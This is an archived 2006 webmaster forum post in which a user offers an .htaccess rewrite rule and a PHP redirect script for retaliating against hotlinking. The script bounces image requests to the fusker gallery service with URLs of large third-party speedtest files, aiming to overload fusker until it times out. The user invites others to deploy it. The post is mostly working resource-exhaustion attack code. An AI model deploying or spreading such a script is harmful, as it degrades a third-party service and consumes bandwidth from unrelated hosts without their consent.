Greenguy's Board


Go Back   Greenguy's Board > General Business Knowledge
Register FAQ Calendar Search Today's Posts Mark Forums Read

 
 
Thread Tools Search this Thread Rate Thread Display Modes
Prev Previous Post   Next Post Next
Old 2006-03-05, 06:02 AM   #17
Mr. Stiff
Trying is the first step towards failure
 
Mr. Stiff's Avatar
 
Join Date: Sep 2005
Location: The Netherlands
Posts: 120
Send a message via ICQ to Mr. Stiff
johnnybg's post about redirecting to fusker itself has inspired me..
I think I have found a way to kill fusker..

.htaccess
Code:
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?YOURDOMAIN.COM [NC]
RewriteRule \.(jpg|jpeg|png|gif)$ http://www.YOURDOMAIN.COM/fuckser.php [NC,R,L]
fuckser.php
Code:
<?php
$payloads = array(	"http://speed.mirror.sptel.com.au/10mb.dat",
					"http://www.truong-is.nl/speedtest/10mb.bin",
					"http://subscribers.aroundcarolina.com/bigtest.xyz",
					"http://www.ayksolutions.com/speedtest/10meg.file",
					"http://comxnet.dk/speed/1MB.bin",
					"http://speedtest.multikabel.net/10mb.bin",
					"http://ns0.multikabel.net/10mb.bin");

$kick = $payloads[rand(0,(count($payloads)-1))];
$url = "http://fusker.lewww.com/index.php?url=".urlencode($kick)."&method=images";
header("Location: $url");

?>
Place fuckser.php in your webroot (or any subdir). You can expand the array with more URL's, anything big will do (.exe, .zip, etc)

This code assumes the user fuskering your gallery is logged in. It will send a request to fusker.lewww.com to download one of those big files.

It seems Fusker doesn't check if the page actually is a HTML page..

Do with this what you like, but if you decide to use it.. Let me know, would see to see 'request timeout' on fusker
Mr. Stiff is offline   Reply With Quote
 

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 06:38 PM.


Mark Read
Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© Greenguy Marketing Inc